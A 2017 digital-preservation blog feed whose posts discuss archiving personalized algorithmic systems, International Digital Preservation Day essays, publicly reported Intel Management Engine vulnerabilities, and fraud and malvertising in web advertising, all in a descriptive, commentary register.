tag:blogger.com,1999:blog-45032929495327606182017-12-13T17:36:24.342-08:00DSHR's BlogI'm David Rosenthal, and this is a place to discuss the work I'm doing in Digital Preservation.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.comBlogger507125tag:blogger.com,1999:blog-4503292949532760618.post-86552985309303177422017-12-07T08:00:00.028-08:002017-12-07T08:01:13.721-08:00Cliff Lynch's Stewardship in the "Age of Algorithms"Cliff Lynch has just published a long and very important article at <i>First Monday</i> entitled <a href="http://dx.doi.org/10.5210/fm.v22i12.8097"><i>Stewardship in the "Age of Algorithms"</i></a>. It is a much broader look than my series <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-1.html"><i>The Amnesiac Civilization</i></a> at the issues around providing the future with a memory of today's society.<br /><br />Cliff accurately describes the practical impossibility of archiving the systems such as Facebook that today form the major part of most people's information environment and asks: <br /><blockquote class="tr_bq">If we abandon the ideas of archiving in the traditional preservation of an artifact sense, it’s helpful to recall the stewardship goal here to guide us: to capture the multiplicity of ways in which a given system behaves over the range of actual or potential users. ... Who are these “users” (and how many of them are there)? How do we characterize them, and how do we characterize system behavior?</blockquote>Then, with a tip of the hat to Don Waters, he notes that this problem is familiar in other fields:<br /><blockquote>they are deeply rooted in historical methods of anthropology, sociology, political science, ethnography and related humanistic and social science disciplines that seek to document behaviors that are essentially not captured in artifacts, and indeed to create such documentary artifacts</blockquote>Unable to archive the system they are observing, these fields try to record and annotate the experience of those encountering the system; to record the performance from the audience's point of view. Cliff notes, and discusses the many problems with, the two possible kinds of audience for "algorithms":<br /><ul><li>Programs, which he calls <i>robotic witnesses</i>, and others call <i>sock puppets</i>. Chief among the problems here is that "algorithms" need robust defenses against programs posing as humans (see, for example, spam, or fake news).</li><li>Humans, which he calls <i>New Nielson Families</i>. Chief among the problems here is the detailed knowledge "algorithms" use to personalize their behaviors, leading to a requirement for vast numbers of humans to observe even somewhat representative behavior.</li></ul>Cliff concludes: <br /><blockquote><a href="https://www.blogger.com/null" name="20a"></a></blockquote><blockquote class="tr_bq">From a stewardship point of view (seeking to preserve a reasonably accurate sense of the present for the future, as I would define it), there’s a largely unaddressed crisis developing as the dominant archival paradigms that have, up to now, dominated stewardship in the digital world become increasingly inadequate. ... the existing models and conceptual frameworks of preserving some kind of “canonical” digital artifacts <a href="https://www.blogger.com/null" name="45a"></a>... are increasingly inapplicable in a world of pervasive, unique, personalized, non-repeatable performances. As stewards and stewardship organizations, we cannot continue to simply complain about the intractability of the problems or speak idealistically of fundamentally impossible “solutions.”<br />...<br />If we are to successfully cope with the new “Age of Algorithms,” our thinking about a good deal of the digital world must shift from artifacts requiring mediation and curation, to experiences. Specifically, it must focus on making pragmatic sense of an incredibly vast number of unique, personalized performances (including interaction with the participant) that can potentially be recorded or otherwise documented, or at least do the best we can with this.</blockquote>I agree that society is facing a crisis in its ability to remember the past. Cliff has provided a must-read overview of the context in which the crisis has developed, and some pointers to pragmatic if unsatisfactory ways to address it. What I would like to see is a even broader view, describing this crisis as one among many caused by the way increasing returns to scale are squeezing out the redundancy essential to a resilient civilization.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-5545545003773174202017-12-05T08:00:00.004-08:002017-12-05T08:00:34.427-08:00International Digital Preservation DayThe Digital Preservation Coalition's <i>International Digital Preservation Day</i> was marked by a <a href="http://www.dpconline.org/blog/idpd?filter_tag[0]=">wide-ranging collection of blog posts</a>. Below the fold, some links to and comments on, a few of them. <br /><a name='more'></a><br />Susan Reilly's <a href="http://www.dpconline.org/blog/idpd/we-need-to-talk-about-copyright"><i>We need to talk about copyright</i></a> makes good points about the importance of copyright for preservation, in the context of Article 5 of the proposed EU Directive on Copyright in the Digital Single Market:<br /><blockquote class="tr_bq">This article recognises the fact that a single copy is not sufficient for digital preservation and that it is necessary to multiple copies. It also allows for format shifting. The proposed directive also has a provision on technical protection measures but does not go far enough in providing a mechanism for recourse should rights owners not cooperate in allowing cultural heritage institutes to circumvent these measures for the purpose of preservation. </blockquote>I agree that "recourse" would be good were it practical, but the idea of libraries suing publishers to obtain access isn't. Lets talk David vs. Goliath in terms of resources. A more realistic approach is to recognize that DRM technologies will be cracked, and to provide libraries with immunity for using tools from the "dark web" to remove DRM.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.dpconline.org/images/DPC/Blog/IDPD17/Cochrane_5.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://www.dpconline.org/images/DPC/Blog/IDPD17/Cochrane_5.gif" data-original-height="652" data-original-width="464" height="200" width="141" /></a></div>Euan Cochrane's <a href="http://www.dpconline.org/blog/idpd/the-emergence-of-digital-patinas"><i>The Emergence of "Digital Patinas"</i></a> is a great argument for emulation:<br /><blockquote class="tr_bq">As software preservation and emulation is becoming more readily accessible, thanks to the work of the <a href="https://web.archive.org/web/20160116221343/http:/www.keep-project.eu/ezpub2/index.php">KEEP project</a>, <a href="https://blog.archive.org/category/emulation/">the Internet Archive</a>, <a href="http://www.dpconline.org/bw-fla.uni-freiburg.de">the bwFLA project</a>, and many others, we’re beginning to see the emergence of a phenomenon whereby digital objects are displaying something that seems strikingly similar to physical patinas. Something perhaps best described as a “digital patina”.</blockquote>I especially like the example of the infuriating Clippy.<br /><br />I strongly disagree with Duff Johnson's <a href="http://www.dpconline.org/blog/idpd/the-only-archival-digital-document-format"><i>The only archival digital format</i></a>. He writes:<br /><blockquote class="tr_bq">PDF’s purpose is to be a document, with all that implies (see above). But that’s not the purpose of HTML. <a href="https://www.pdfa.org/the-power-of-the-page/">HTML isn’t a document, it’s an experience.</a> HTML is about making and consuming; PDF is how you keep it, and PDF/A is how you keep it forever (preserving the file’s actual bytes, of course, is up to you).</blockquote>There are at least three big problems with this. First, PDF/A does not preserve all aspects of a document; PDF has many document capabilities that PDF/A excludes. Second, but more important, digital preservation is about preserving the experience! Documents are a small and decreasing proportion of the digital content that needs to be preserved. Third, the idea that the choice of a format is what digital preservation is all about might have been true two decades ago, but <a href="http://blog.dshr.org/2015/11/emulation-virtualization-as.html">it is a red herring today</a>.<br /><br />David Minor's <a href="http://www.dpconline.org/blog/idpd/what-we-ve-done-well"><i>What we’ve done well, and some things we still need to figure out</i></a> ends with <a href="http://blog.dshr.org/2017/08/preservation-is-not-technical-problem.html">a point I've made repeatedly</a>:<br /><blockquote><b>Funding</b>. Yes. Of course. Funding. Funding funding funding. This is the largest single mountain we still have to climb. Digital preservation, done correctly, is expensive. It just is. And it’s not a problem that technology is going to solve. Or some new whiz bang economic theory that makes sense to twelve special people. It’s only going to cease being a problem when the people who care about their precious bits fully understand why it’s expensive, and make the commitment to support it. This is the ur-issue for our field, and has been since the beginning. </blockquote>Eld Zierau's <a href="http://www.dpconline.org/blog/idpd/bit-preservation-is-not-a-question-of-technology"><i>Bit Preservation is NOT a Question of Technology!</i></a> raises the other big non-technical aspect of preservation, organizational. She stresses the need for auditing to ensure that organizations are actually delivering on the contracts they enter into:<br /><blockquote>The experience in Denmark is that we cannot rely on audit certifications. There needs to be specific audits that ensure that the contracts are followed, but also to sharpen contracts in cases where we have discovered risks that were not covered before (for example, time lap from data arriving to an offline tape replica unit until it is finally written and securely locked away). The experience is also that many organisations are reluctant to allow audits to be performed in their organisation. </blockquote>Which, of course, raises the issue of the <a href="https://documents.clockss.org/index.php?title=LOCKSS:_Polling_and_Repair_Protocol">technology to support auditing</a>.<br /><br />Richard Wright's <a href="http://www.dpconline.org/blog/idpd/the-future-of-television-archives"><i>The Future Of Television Archives</i></a> makes two important points:<br /><blockquote class="tr_bq">While drama and entertainment programmes are kept for repeats and for sale to other countries, factual content is heavily recycled to add depth and interest to current programmes. In the BBC, about 30 to 40 percent of 'the news' is actually archive material. ... Up to 2010, about 20% of the BBC television archive was accessed each year, and 95% of that use was internal: back into the BBC for adding depth to new programmes. The other 5% was commercial use.</blockquote>And, of particular importance for efforts such as the <a href="https://archive.org/details/tv">Internet Archive's TV collection</a>:<br /><blockquote class="tr_bq">Off-air recordings are&nbsp; fine for viewing copies, but have real quality limitations when it comes to re-purposing the content for new programmes. The video signal for satellite transmission is compressed by a factor of 10 to 20. This is lossy compression, meaning original quality is not recoverable.&nbsp; ...<br /><br />Who cares? The future will care. Lossy compression today leads to 'cascaded compression' in the future, when material is recoded to new standards. Decades of experience show that there is a great risk when cascading: eventually there will be significant failures. ... transcoding errors and cascaded quality loss are the time bomb ticking in all archives containing content with lossy compression – meaning all off-air archives.<br />&nbsp; <br />In addition, professional TV archives no longer get as much master material as they used to. In 1980 the BBC made about 90% of its output in-house, so the archive could get 'the master tape'. Now that figure has been cut to 30%. ... The future of master quality (production quality) video content is very much in doubt.</blockquote>Yvonne Tunnat's <a href="http://www.dpconline.org/blog/idpd/plans-are-my-reality"><i>Plans are my reality</i></a> is the sad story of someone for whom reading a <a href="http://blog.dshr.org/2009/01/postels-law.html">post on my blog from 2009</a> could have saved a whole lot of work:<br /><blockquote>My preservation plan was as following:<br /><ol><li>Gather all bad PDF</li><li>Migrate them to good PDF</li><li>Check if they still look alike</li></ol></blockquote>The fact that "bad" and "good" PDFs looked the same is an example of <a href="http://blog.dshr.org/2009/01/postels-law.html">Postel's Law</a>, especially since: <br /><blockquote>The bad-to-good migration tool built by my co-worker turned out to be too basic, just putting the bad PDF pages into a new PDF, which then would be considered ok by JHOVE, which only checks the overall structure. </blockquote>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com0tag:blogger.com,1999:blog-4503292949532760618.post-58839545457040533902017-11-28T08:00:00.004-08:002017-11-28T08:00:02.101-08:00Intel's "Management Engine"Back in May Erica Portnoy and Peter Eckersley, writing for the EFF's Deep Links blog, <a href="https://www.eff.org/deeplinks/2017/05/intels-management-engine-security-hazard-and-users-need-way-disable-it">summed up the situation in a paragraph</a>:<br /><blockquote class="tr_bq">Since 2008, most of Intel’s <a href="https://www.eff.org/deeplinks/2017/05/intels-management-engine-security-hazard-and-users-need-way-disable-it#update-5-12">chipsets</a> have contained a tiny homunculus computer called the “Management Engine” (ME). The ME is a largely undocumented master controller for your CPU: it works with system firmware during boot and has direct access to system memory, the screen, keyboard, and network. All of the code inside the ME is secret, signed, and tightly controlled by Intel. ... there is presently no way to disable or limit the Management Engine in general. Intel urgently needs to provide one.</blockquote>Recent events have pulled back the curtain somewhat and revealed that things are worse than we knew in May. Below the fold, some details.<br /><a name='more'></a><br />Concern about the ME goes back further. Sparked by a talk given at the Chaos Computer Conference by <a href="https://hackaday.com/2015/12/28/32c3-towards-trustworthy-x86-laptops/">[Joanna Rutkowska] of the Qubes OS project</a>, back in January 2016 <a href="https://hackaday.com/2016/01/22/the-trouble-with-intels-management-engine/">Brian Benchoff at <i>Hackaday</i> wrote</a>:<br /><blockquote class="tr_bq">Extremely little is known about the ME, except for some of its capabilities. The ME has complete access to all of a computer’s memory, its network connections, and every peripheral connected to a computer. It runs when the computer is hibernating, and can intercept TCP/IP traffic. Own the ME and you own the computer.<br /><br />There are no known vulnerabilities in the ME to exploit right now: we’re all locked out of the ME. But that is security through obscurity. Once the ME falls, everything with an Intel chip will fall. It is, by far, the scariest security threat today, and it’s one that’s made even worse by our own ignorance of how the ME works.</blockquote>The EFF's post was a reaction to the discovery of a vulnerability in one of the modules that run on the ME, Intel's Active Management Technology (AMT) admin tool. <a href="https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/">Chris Williams at <i>The Register</i> explains</a>: <br /><blockquote class="tr_bq">Intel provides a remote management toolkit called AMT for its business and enterprise-friendly processors; this software is part of <a href="https://www.theregister.co.uk/2011/11/04/desktop_management/" target="_blank">Chipzilla's vPro suite</a> and runs at the firmware level, below and out of sight of Windows, Linux, or whatever operating system you're using. The code runs on Intel's Management Engine, a tiny secret computer within your computer that has full control of the hardware and talks directly to the network port, allowing a device to be remotely controlled regardless of whatever OS and applications are running, or not, above it.<br /><br />Thus, AMT is designed to allow IT admins to remotely log into the guts of computers so they can reboot a knackered machine, repair and tweak the operating system, install a new OS, access a virtual serial console, or gain full-blown remote desktop access via VNC. It is, essentially, god mode.<br /><br />Normally, AMT is password protected. This week it emerged <a href="https://www.theregister.co.uk/2017/05/01/intel_amt_me_vulnerability/" target="_blank">this authentication can be bypassed</a>, potentially allowing miscreants to take over systems from afar or once inside a corporate network. This critical security bug was designated <a href="https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr" rel="nofollow" target="_blank">CVE-2017-5689</a>. While Intel has patched its code, people have to pester their hardware suppliers for the necessary updates before they can be installed.</blockquote>The <a href="https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/">vulnerability was embarrassing</a>:<br /><blockquote class="tr_bq">AMT is accessed over the network via a bog-standard web interface: the service listens on ports 16992 and 16993. Visiting this with a browser brings up a prompt for a password, and this passphrase is sent using standard <a href="https://www.ietf.org/rfc/rfc2617.txt" rel="nofollow" target="_blank">HTTP Digest</a> authentication: the username and password are hashed using a nonce from the AMT firmware plus a few other bits of metadata. This scrambled response is checked by the AMT software to be valid, and if so, access is granted to the management interface.<br /><br />But if you send an empty response, the firmware is fooled into thinking this is correct and lets you through. </blockquote>Intel patched it, but it took a while for the patch to filter through to the system vendors and to get installed on the millions of vulnerable CPUs in the field. Meanwhile, an incredible number of systems were vulnerable to being remotely pwned.<br /><br />Then, in late September <a href="https://www.theregister.co.uk/2017/09/26/intel_management_engine_exploit/">Richard Chirgwin at <i>The Register</i> reported that</a>:<br /><blockquote class="tr_bq">Positive Technologies researchers say the exploit “allows an attacker of the machine to run unsigned code in the Platform Controller Hub on any motherboard via Skylake+”.<br />...<br />For those whose vendors haven't pushed a firmware patch for AMT, in August Positive Technologies discovered how to <a href="https://www.theregister.co.uk/2017/08/29/intel_management_engine_can_be_disabled/" rel="nofollow" target="_blank">switch off Management Engine</a>.<br />... <br />The company's researchers Mark Ermolov and Maxim Goryachy discovered is that when Intel switched Management Engine to a modified Minix operating system, it introduced a vulnerability in an unspecified subsystem.<br /><br />Because ME runs independently of the operating system, a victim's got no way to know they were compromised, and infection is “resistant” to an OS re-install and BIOS update, Ermolov and Goryachy say.</blockquote><a href="https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/">More details emerged two weeks ago</a>:<br /><blockquote class="tr_bq">Positive has confirmed that recent revisions of Intel's Management Engine (IME) feature Joint Test Action Group (<a href="https://www.xjtag.com/about-jtag/jtag-high-level-guide/" rel="nofollow" target="_blank">JTAG</a>) debugging ports that can be reached over USB. JTAG grants you pretty low-level access to code running on a chip, and thus we can now delve into the firmware driving the Management Engine. ... There have been long-running fears IME is insecure, which is not great as it's built right into the chipset: it's a black box of exploitable bugs, as <a href="https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/" rel="nofollow" target="_blank">was confirmed in May</a> when researchers noticed you could administer the Active Management Technology software suite running on the microcontroller with an empty credential string over a network.&nbsp;</blockquote><a href="https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/">Positive discovered that</a>:<br /><blockquote class="tr_bq">since Skylake, Intel's Platform Controller Hub, which manages external interfaces and communications, has offered USB access to the engine's JTAG interfaces. The new capability is DCI, aka Direct Connect Interface.<br /><br />Aside from any remote holes found in the engine's firmware code, any attack against IME needs physical access to a machine's USB ports which as we know is <a href="https://www.theregister.co.uk/2016/04/11/half_plug_in_found_drives/" rel="nofollow" target="_blank">really difficult</a>.</blockquote><a href="https://www.youtube.com/watch?v=iffTJ1vPCSo">Google's Ronald Minich reported</a> that running on the ME was a <a href="https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/">well-known open source operating system, MINIX</a>:<br /><blockquote class="tr_bq">And it turns out that while Intel talked to MINIX's creator about using it, the tech giant never got around to saying it had put it into recent CPU chipsets it makes.<br /><br />Which has the permissively licensed software's granddaddy, Professor Andrew S. Tanenbaum, just a bit miffed. As Tanenbaum <a href="http://www.cs.vu.nl/~ast/intel/" target="_blank">wrote</a> this week in an open letter to Intel CEO Brian Krzanich: <br /><blockquote>The only thing that would have been nice is that after the project had been finished and the chip deployed, that someone from Intel would have told me, just as a courtesy, that MINIX was now probably the most widely used operating system in the world on x86 computers. That certainly wasn't required in any way, but I think it would have been polite to give me a heads up, that's all.</blockquote></blockquote><a href="http://www.tomshardware.com/news/google-removing-minix-management-engine-intel,35876.html">Google isn't happy about this</a>:<br /><blockquote class="tr_bq">What’s concerning Google is the complexity of the ME. ... The real focus, though, is what’s in it and the consequences. According the Minnich, that list includes web server capabilities, a file system, drivers for disk and USB access, and, possibly, some hardware DRM-related capabilities. ... An OS full of latent capabilities to access hardware is just giving those people more room to be creative. The possibilities of what could happen if attackers figure out how to load their own software onto the ME’s OS are endless. Minnich and his team (and a number of others) are interested in removing ME to limit potential attackers’ capabilities.</blockquote>And, as one should have expected, once Intel took a look at the problem they found it was <a href="https://arstechnica.com/information-technology/2017/11/intel-warns-of-widespread-vulnerability-in-pc-server-device-firmware/">much worse than initially reported</a>:<br /><blockquote>Intel has <a href="https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&amp;languageid=en-fr">issued a security alert</a> that management firmware on a number of recent PC, server, and Internet-of-Things processor platforms are vulnerable to remote attack. Using the vulnerabilities, the most severe of which was uncovered by Mark Ermolov and Maxim Goryachy of Positive Technologies Research, remote attackers could launch commands on a host of Intel-based computers, including laptops and desktops shipped with Intel Core processors since 2015. They could gain access to privileged system information, and millions of computers could essentially be taken over as a result of the bug. Most of the vulnerabilities require physical access to the targeted device, but one allows remote attacks with administrative access.</blockquote>Google, and anyone running a data center, clearly needs an equivalent of the remote access capabilities AMT provides. For the rest of us, <a href="https://puri.sm/posts/purism-librem-laptops-completely-disable-intel-management-engine/"><i>Purism Librem Laptops Completely Disable Intel’s Management Engine</i></a><br /><blockquote>“Disabling the Management Engine, long believed to be impossible, is now possible and available in all current Librem laptops, it is also available as a software update for previously shipped recent Librem laptops.” says Todd Weaver, Founder &amp; CEO of Purism.<br />...<br />Disabling the Management Engine is no easy task, and it has taken security researchers years to find a way to properly and verifiably disable it. Purism, because it runs coreboot and maintains its own BIOS firmware update process has been able to release and ship coreboot that disables the Management Engine from running, directly halting the ME CPU without the ability of recovery. </blockquote>What does all this mean? It means physical security of "Intel inside" computers is really important, since they are all vulnerable to a really hard to detect version of the <a href="https://security.stackexchange.com/questions/159173/what-exactly-is-an-evil-maid-attack">"Evil Maid Attack"</a>:<br /><blockquote>"Evil maid" attacks can be anything that is done to a machine via physical access while it is turned off, even though it's encrypted. The name comes from the idea that an attacker could infiltrate or pay off the cleaning staff wherever you're staying to compromise your laptop while you're out.</blockquote>Since effective physical security for laptops is impossible, this means that any network to which laptops can be connected has to assume that one of them may be infected at a level that cannot be detected by any software running on the CPU, and this infection may be a threat to other machines on the network.<br />Although I didn't know about the ME issues when I <a href="http://blog.dshr.org/2017/10/crowdfunding.html">crowdfunded</a> <a href="https://www.crowdsupply.com/design-shift/orwl">[ORWL]</a>, it is a good reason for doing so. David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-8566721799211452582017-11-21T08:00:00.000-08:002017-11-21T08:00:07.161-08:00Has Web Advertising Jumped The Shark?The Web runs on advertising. Has Web advertising jumped the shark? The <a href="https://en.wikipedia.org/wiki/Jumping_the_shark">relevant Wikipedia article says</a>:<br /><blockquote>The usage of "jump the shark" has subsequently broadened beyond television, indicating the moment when a brand, design, franchise, or creative effort's evolution declines, or when it changes notably in style into something unwelcome. </blockquote>There are four big problems with Web advertising as it currently exists:<br /><ol><li>Bad guys love it.</li><li>Readers hate it.</li><li>Webmasters hate it. </li><li>Advertisers find it wastes money.</li></ol>#4 just might have something to do with #3, #2 and #1. It seems that there's a case to be made. Below the fold I try to make it.<br /><a name='more'></a><br /><h3>Bad guys love it</h3>There are at least three major, and one so far minor, business opportunities for the bad guys in Web advertising:<br /><ul><li>Fraud</li><li>Malvertising</li><li>Domain spoofing</li><li>Cryptojacking</li></ul>They're all enabled by the fact that, as blissex wrote in <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html?showComment=1508358199672#c8289190784291053547">this comment</a>, we are living:<br /><blockquote>In an age in which every browser gifts a free-to-use, unlimited-usage, fast VM to every visited web site, and these VMs can boot and run quite responsive 3D games or Linux distributions </blockquote><h4>Fraud</h4>In 2015 George Slefo at <i>Ad Age</i> <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">reported that:</a><br /><blockquote>As digital spend continues to reach landmark highs -- it hit $27.5 billion for the first half of 2015 -- so does ad fraud, which is now estimated to cost the industry about $18.5 billion annually, according to a report released Thursday by Distil Networks.<br /><br />That means for every $3 spent, $1 is going to ad fraud.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-6cvgrUKxuvI/WgY4_Ys2yKI/AAAAAAAAEBA/SdBat4iOtvEQWIs1QoKgjwcUSeL4AQmTACLcBGAs/s1600/BotTraffic.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="317" data-original-width="309" height="200" src="https://2.bp.blogspot.com/-6cvgrUKxuvI/WgY4_Ys2yKI/AAAAAAAAEBA/SdBat4iOtvEQWIs1QoKgjwcUSeL4AQmTACLcBGAs/s200/BotTraffic.png" width="194" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.bloomberg.com/features/2015-click-fraud/">Source</a></td></tr></tbody></table>A long 2015 report from <a href="https://www.bloomberg.com/features/2015-click-fraud/">a team at Bloomberg</a> took off from <a href="http://www.marketing.org/pcontent/show/id/rr-2015-bot-baseline">this study</a>:<br /><blockquote>A study done last year in conjunction with the Association of National Advertisers embedded billions of digital ads with code designed to determine who or what was seeing them. Eleven percent of display ads and almost a quarter of video ads were "viewed" by software, not people. According to the ANA study, which was conducted by the security firm White Ops and is titled The Bot Baseline: Fraud In Digital Advertising, fake traffic will cost advertisers $6.3 billion this year.<br /><br />One ad tracked in the study was a video spot for Chrysler that ran last year on Saveur.tv, a site based on the food and travel lifestyle magazine. Only 2 percent of the ad views registered as human, according to a person who was briefed on data provided to the study's participants. </blockquote>Note the roughly 3x difference in the 2015 estimates of fraud; from <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">$18.5B</a> to <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">$6.3B</a> in a <a href="http://adage.com/article/digital/ad-fraud-eating-digital-advertising-revenue/301017/">$55B</a> industry, or between 34% and 11%. This suggests that researchers have only a vague idea of the scale of the problem, but even the low estimate would put ad fraud as a company in the bottom half of the S&amp;P 500. Other estimates are in the same range. For example, at <i>The Register</i> <a href="https://www.theregister.co.uk/2017/08/17/ad_fraud_looks_really_bad/" rel="nofollow">Thomas Claburn writes</a>:<br /><blockquote class="tr_bq">'It's about 60 to 100 per cent fraud, with an average of 90 per cent, but it is not evenly distributed,' said Augustine Fou, an independent ad fraud researcher, in <a href="https://www.slideshare.net/augustinefou/state-of-digital-ad-fraud-august-2017" rel="nofollow">a report</a> published this month.<br /><br />... Among quality publishers, Fou reckons $1 spent buys $0.68 in ads actually viewed by real people. But on ad networks and open exchanges, fraud is rampant.<br /><br />With ad networks, after fees and bots – which account for 30 per cent of traffic – are taken into account, $1 buys $0.07 worth of ad impressions viewed by real people. With open ad exchanges – where bots make up 70 per cent of traffic – that figure is more like $0.01. In other words, web adverts displayed via these networks just aren't being seen by actual people, just automated software scamming advertisers. </blockquote>The ANA report covered the full range of ad fraud but focused on <a href="https://en.wikipedia.org/wiki/Click_fraud">click fraud, which Wikipedia defines thus</a>:<br /><blockquote><b>Click fraud</b> is a type of fraud that occurs on the Internet in pay-per-click (PPC) online advertising. In this type of advertising, the owners of websites that post the ads are paid an amount of money determined by how many visitors to the sites click on the ads. Fraud occurs when a person, automated script or computer program imitates a legitimate user of a web browser, clicking on such an ad without having an actual interest in the target of the ad's link.</blockquote>The study is now annual, the <a href="http://www.ana.net/content/show/id/botfraud-2017">2017 edition reported that</a>:<br /><blockquote>The third annual Bot Baseline Report reveals that the economic losses due to bot fraud are estimated to reach $6.5 billion globally in 2017. This is down 10 percent from the $7.2 billion reported in last year's study. The fraud decline is particularly impressive recognizing that this is occurring when digital advertising spending is expected to increase by 10 percent or more. </blockquote>Nevertheless, at least a gross $6.5B/year is flowing to the bad guys. Not bad for a high-margin business.<br /><h4>Malvertising</h4><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-6ciBET60O7k/Wgkf-GsW1-I/AAAAAAAAECM/D01ZigbP8ikS9Uef_kBfMfpqBJ0Dpg-CwCLcBGAs/s1600/exploit-kit-evolution.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="433" data-original-width="600" height="143" src="https://2.bp.blogspot.com/-6ciBET60O7k/Wgkf-GsW1-I/AAAAAAAAECM/D01ZigbP8ikS9Uef_kBfMfpqBJ0Dpg-CwCLcBGAs/s200/exploit-kit-evolution.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-evolution-of-exploit-kits.pdf">Source</a></td></tr></tbody></table>Web advertising is a channel by which web sites deliver third-party content to browsers. Sites generally have little control over this third-party content. So bad guys can use the Web advertising channel directly, or by compromising an ad supplier, to deliver malware. This is called malvertising. Malware such as <a href="https://heimdalsecurity.com/blog/ultimate-guide-angler-exploit-kit-non-technical-people/">Angler</a> has been disseminated via <a href="https://blog.malwarebytes.org/threat-analysis/2016/03/large-angler-malvertising-campaign-hits-top-publishers/">even the most prominent web sites</a>:<br /><blockquote>However, out of the blue on the weekend we witnessed a huge spike in malicious activity emanating out of two suspicious domains. Not only were there a lot of events, but they also included some very high profile publishers, which is something we haven’t seen in a while:<br /><table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="height: 289px; width: 331px;"><tbody><tr><td><b>Publisher</b></td><td><b>Traffic (monthly)*</b></td></tr><tr><td>msn.com</td><td>1.3B</td></tr><tr><td>nytimes.com</td><td>313.1M</td></tr><tr><td>bbc.com</td><td>290.6M</td></tr><tr><td>aol.com</td><td>218.6M</td></tr><tr><td>my.xfinity.com</td><td>102.8M</td></tr><tr><td>nfl.com</td><td>60.7M</td></tr><tr><td>realtor.com</td><td>51.1M</td></tr><tr><td>theweathernetwork.com</td><td>43M</td></tr><tr><td>thehill.com</td><td>31.4M</td></tr><tr><td>newsweek.com</td><td>9.9M</td></tr></tbody></table><i><br /></i></blockquote>Or more recently, <a href="https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/">this campaign</a>:<br /><blockquote class="tr_bq">RoughTed is a large malvertising operation that peaked in March 2017 but has been going on for at least well over a year. It is unique for its considerable&nbsp;scope ranging from scams to exploit kits, targeting a wide array of users via their operating system, browser, and geolocation to deliver the appropriate payload.</blockquote>Which is <a href="https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/">very sophisticated</a>:<br /><blockquote class="tr_bq">Another interesting aspect is that redirections to RoughTed domains seem to happen even to those running ad-blockers and that was reported by users of <a href="https://github.com/jspenguin2017/AdBlockProtector/issues/157" rel="noopener noreferrer" target="_blank">Adblock Plus</a>,&nbsp;<a href="https://github.com/uBlockOrigin/uAssets/issues/389" rel="noopener noreferrer" target="_blank">uBlock origin</a>&nbsp;or <a href="https://forum.adguard.com/index.php?threads/resolved-userscloud-com-missed-popups.19868/" rel="noopener noreferrer" target="_blank">AdGuard</a>.</blockquote>Thus readers don't merely use ad-blockers to retain control over their user experience, prevent tracking and economize on bandwidth, but also to reduce their risk of infection by malware.<br /><h4>Domain Spoofing</h4><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-oBRvvU1pjMQ/WCYJF4wmsfI/AAAAAAAADWM/xEMY6vxaqIAieYZLRl4CUYkPjrFZnf4zgCPcBGAYYCw/s1600/AdNetworks.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="112" src="https://2.bp.blogspot.com/-oBRvvU1pjMQ/WCYJF4wmsfI/AAAAAAAADWM/xEMY6vxaqIAieYZLRl4CUYkPjrFZnf4zgCPcBGAYYCw/s200/AdNetworks.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm">Source</a></td></tr></tbody></table>Most advertisers buy their space on web sites via <i>exchanges</i>, real-time auction systems that connect space sellers (web sites) with space buyers (advertisers). Maciej Cegłowski described the baroque complexity of this system in <a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm"><i>What Happens Next Will Amaze You</i></a>. Fraudsters take advantage of this complexity and obscurity to trick advertisers into buying space on web sites that the site isn't selling, and <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">pocket the proceeds on an enormous scale</a>:<br /><blockquote>Methbot, a domain spoofing scam that's <a href="http://adage.com/article/digital/ad-fraud-scheme-cost-advertisers-3-million-day/307235/">widely regarded as the largest ad fraud attack in history</a>, bilked marketers of $3 million to $5 million a day for over a month. Even Google, which is regarded as having the best defenses 